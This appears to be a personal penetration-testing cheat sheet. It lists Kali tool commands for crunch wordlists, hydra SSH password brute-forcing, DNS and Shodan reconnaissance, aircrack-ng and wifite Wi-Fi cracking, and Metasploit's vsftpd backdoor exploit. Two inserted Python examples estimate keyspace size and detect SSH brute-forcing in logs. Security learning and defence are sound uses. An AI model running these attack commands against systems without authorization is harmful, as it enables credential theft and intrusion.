Kali Pentest Netsec
Password Cracking
generate wordlists with CRUNCH
start Crunch on Kali
crunch <min> <max> <character set> -o <output file>
> crunch 5 18 password123$ -o wordlist.txt
if you're certain a particular string is in a password, e.g. "ballz" appears somewhere in a user's password, let -p generate every permutation of the given words (min/max are ignored when -p is used):
> crunch 5 18 -p ballz <insert any other strings>
> crunch 3 20 -p ballz nutz deez -o wordlist.txt
limit each file to 25 passwords and split wordlists into chunks of 30MB each (both need -o START):
> crunch 3 10 -c 25 -b 30mb -o START
compress wordlist
> crunch 3 10 pass123 -z 7z -o START
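Before kicking off a run like "crunch 5 18 password123$", it pays to know how many candidates it will emit and how much disk it needs. The following is an added example, not part of crunch or of these notes: it models crunch's default behaviour (every combination of the charset, repetition allowed, one candidate per line), the -p permutation mode, and the -b chunking, and converts the count into a worst-case cracking time at an assumed guess rate. The guess rate and the comparison runs are assumptions chosen for illustration.

```python
import math

# Added example (not crunch's own code): estimate the size of a crunch run so
# you can judge feasibility before starting it. Model assumptions: crunch's
# default mode (all combinations, repetition allowed), one candidate per line.


def distinct_charset(charset):
    """crunch uses the charset string as given; counting distinct characters
    gives the number of distinct strings the run can contain."""
    return "".join(dict.fromkeys(charset))


def keyspace(min_len, max_len, charset):
    """Candidates for every length from min_len to max_len inclusive."""
    n = len(distinct_charset(charset))
    return sum(n ** length for length in range(min_len, max_len + 1))


def output_bytes(min_len, max_len, charset):
    """Bytes written: a candidate of length L costs L + 1 bytes (newline)."""
    n = len(distinct_charset(charset))
    return sum(n ** length * (length + 1) for length in range(min_len, max_len + 1))


def permutation_count(words):
    """crunch -p: every ordering of the given words; min/max are ignored."""
    return math.factorial(len(words))


def chunk_count(total_bytes, chunk_bytes):
    """Number of files produced when output is split with -b (e.g. 30mb)."""
    return math.ceil(total_bytes / chunk_bytes)


def crack_time_seconds(candidates, guesses_per_second):
    """Worst-case time to try every candidate at a given guess rate."""
    return candidates / guesses_per_second


def human_bytes(n):
    for unit in ("B", "KB", "MB", "GB", "TB", "PB"):
        if n < 1024:
            return f"{n:.1f} {unit}"
        n /= 1024
    return f"{n:.1f} EB"


if __name__ == "__main__":
    RATE = 1e6  # assumed guesses per second, purely for the comparison
    # The two charset runs from the notes above.
    for min_len, max_len, charset in ((5, 18, "password123$"), (3, 10, "pass123")):
        count = keyspace(min_len, max_len, charset)
        size = output_bytes(min_len, max_len, charset)
        days = crack_time_seconds(count, RATE) / 86400
        print(f"crunch {min_len} {max_len} {charset}: {count:,} candidates, "
              f"{human_bytes(size)}, {chunk_count(size, 30 * 1024 * 1024):,} files "
              f"of 30MB, ~{days:,.0f} days at {RATE:,.0f} guesses/s")
    # The -p run: three words give 3! orderings.
    print(f"crunch -p ballz nutz deez: {permutation_count(['ballz', 'nutz', 'deez'])} candidates")
```

Running it shows why the 5..18 run over an 11-character alphabet is not something you wait for, while the -p run is a handful of lines; the same arithmetic is what a defender uses to judge how much a password policy's minimum length and alphabet actually buy.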
HYDRA
crack passwords for a single username (-l user, -P password list, -vV verbose with each attempt shown, -f stop after the first valid pair, -t 5 parallel connections)
hydra -l username -P pw.txt -vV -f -t 5 192.168.50.235 ssh
crack passwords from a username list (-L; -F stops all hosts after the first valid pair)
hydra -L users.txt -P pw.txt -vVfF -t 5 192.168.50.235 ssh
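From the other side of the wire, a hydra run like the ones above shows up in sshd's log as a burst of "Failed password" lines from one source, across several usernames when -L is used, each on a fresh source port. The following is an added example, not part of hydra or of these notes: a small detector that parses constructed auth.log lines (the sample is made up; IPs are documentation ranges) and alerts when one source IP accumulates a threshold of failures inside a sliding window. The threshold, window and the 2024 year used to complete the syslog timestamps are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Added example (not hydra's or sshd's code): flag SSH password brute-forcing
# from sshd log lines. Constructed sample input, documentation IP ranges only.
SAMPLE_LOG = """\
Mar  1 10:00:01 host sshd[1234]: Failed password for invalid user admin from 192.0.2.10 port 51234 ssh2
Mar  1 10:00:02 host sshd[1235]: Failed password for root from 192.0.2.10 port 51235 ssh2
Mar  1 10:00:03 host sshd[1236]: Failed password for invalid user guest from 203.0.113.5 port 60001 ssh2
Mar  1 10:00:03 host sshd[1237]: Failed password for invalid user admin from 192.0.2.10 port 51236 ssh2
Mar  1 10:00:04 host sshd[1238]: Failed password for invalid user test from 192.0.2.10 port 51237 ssh2
Mar  1 10:00:05 host sshd[1239]: Failed password for root from 192.0.2.10 port 51238 ssh2
Mar  1 10:00:06 host sshd[1240]: Failed password for bob from 192.0.2.10 port 51239 ssh2
Mar  1 10:00:09 host sshd[1241]: Accepted password for bob from 198.51.100.7 port 40000 ssh2
"""

# Matches both "Failed password for root from ..." and the "invalid user" form.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_failed(line, year=2024):
    """Return (timestamp, user, source_ip) for a failed-password line, else None.
    Syslog timestamps carry no year, so one is supplied (assumption: 2024)."""
    m = FAILED_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["user"], m["ip"]


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Alert once per source IP when it reaches `threshold` failures within a
    sliding window of `window_seconds`. Each alert lists the usernames tried,
    which distinguishes a single-user guess (-l) from a user list (-L)."""
    recent = defaultdict(deque)  # ip -> (ts, user) events inside the window
    alerted = set()
    alerts = []
    for line in lines:
        parsed = parse_failed(line)
        if parsed is None:
            continue
        ts, user, ip = parsed
        q = recent[ip]
        q.append((ts, user))
        while (ts - q[0][0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold and ip not in alerted:
            alerted.add(ip)
            alerts.append({
                "ip": ip,
                "failures": len(q),
                "users": sorted({u for _, u in q}),
                "first": q[0][0],
                "last": ts,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(f"{alert['ip']}: {alert['failures']} failures between "
              f"{alert['first']:%H:%M:%S} and {alert['last']:%H:%M:%S}, "
              f"users tried: {', '.join(alert['users'])}")
```

On the sample, 192.0.2.10 trips the alert on its fifth failure within four seconds, with three distinct usernames, while the single failure from 203.0.113.5 stays below threshold. The -t 5 parallelism in the hydra commands is visible as the rapid succession of different source ports; a production rule would also key on that and on the ratio of "invalid user" to valid-user failures.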
Domain sniffing
get all pub IPs for domain
fierce --domain mydomain.com
also query: dnsdumpster.com
Shodan
pip3 install shodan
shodan init <API KEY>
scan an IP range
shodan scan submit <IP range>
Wifi Cracking
apt install aircrack-ng
put wifi iface into Monitor mode
check whether the iface supports monitor mode
iw list (look for "monitor" under "Supported interface modes")
airmon-ng check
kill procs holding up iface
airmon-ng check kill
start monitor
airmon-ng start <name of wifi iface>
stop monitor
airmon-ng stop wlan0mon
use wifite to do all above
wifite --wpa --dict /usr/share/wordlists/rockyou.txt --kill
crack password of captured pcap
aircrack-ng capturedpackets.cap -w wordlist.txt
Metasploit
install
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod +x msfinstall && ./msfinstall
msfdb init
enter console
msfconsole
configure target and port
> set RHOSTS <IP or hostname>
> set RPORT <PORT>
search for an exploit
search type:exploit platform:unix
search type:exploit ssh
search type:exploit platform:osx
example: vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
check current payload and options
show options
show payloads
run the payload
run